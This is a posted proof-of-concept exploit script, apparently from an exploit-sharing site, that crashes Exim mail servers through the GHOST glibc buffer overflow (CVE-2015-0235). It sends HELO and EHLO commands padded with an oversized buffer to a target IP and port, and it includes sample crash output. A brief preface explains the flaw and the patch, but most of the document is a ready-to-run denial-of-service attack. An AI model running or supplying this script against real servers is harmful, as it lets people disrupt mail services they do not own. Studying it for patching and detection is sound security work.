_d3f4ult

[+] ghost-smtp-dos.py [+]

Jan 30th, 2015
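  1. The script below is a proof-of-concept denial-of-service exploit for the GHOST vulnerability (CVE-2015-0235, a buffer overflow in glibc's gethostbyname functions) as reached through an Exim SMTP server; a successful run results in a service crash. The flaw lives in glibc rather than in Exim itself, so the remedy is a patched glibc followed by a restart of every service that still has the old library loaded; Exim reaches the vulnerable call only when it is configured to verify the HELO/EHLO name (for example with helo_verify_hosts or helo_try_verify_hosts).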
  2.  
  3. #!/usr/bin/python
  4. # Exim ESMTP DoS Exploit by 1N3 v20150128
  5. # CVE-2015-0235 GHOST glibc gethostbyname buffer overflow
  6. # http://crowdshield.com
  7. #
  8. # USAGE: python ghost-smtp-dos.py <ip> <port>
  9. #
  10. # Escape character is '^]'.
  11. # 220 debian-7-7-64b ESMTP Exim 4.80 ...
  12. # HELO
  13. # 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  14.  00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  15. # Connection closed by foreign host.
  16. #
  17. # user@debian-7-7-64b:~$ dmesg
  18. # ...
  19. # [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in
  20. # libc-2.13.so[7fabef2a2000+182000]
  21.  
  22. import socket
  23. import time
  24. import sys, getopt
  25.  
  26. def main(argv):
  27.     argc = len(argv)
  28.  
  29.     if argc <= 1:
  30.             print "usage: %s <host>" % (argv[0])
  31.             sys.exit(0)
  32.  
  33.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  34.     buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  35. 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
  36.  
  37.     target = argv[1] # SET TARGET
  38.     port = argv[2] # SET PORT
  39.  
  40.     print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
  41.     print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))
  42.     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  43.     connect=s.connect((target,int(port)))
  44.     data = s.recv(1024)
  45.     print "CONNECTION: " +data
  46.     s.send('HELO ' + buffer + '\r\n')
  47.     data = s.recv(1024)
  48.     print "received: " +data
  49.     s.send('EHLO ' + buffer + '\r\n')
  50.     data = s.recv(1024)
  51.     print "received: " +data
  52.     s.close()
  53.  
  54. main(sys.argv)  # called unconditionally (no `if __name__ == "__main__":` guard), so importing this file also runs it
  55.  
  56.         #  1337day.com [2015-01-30]  #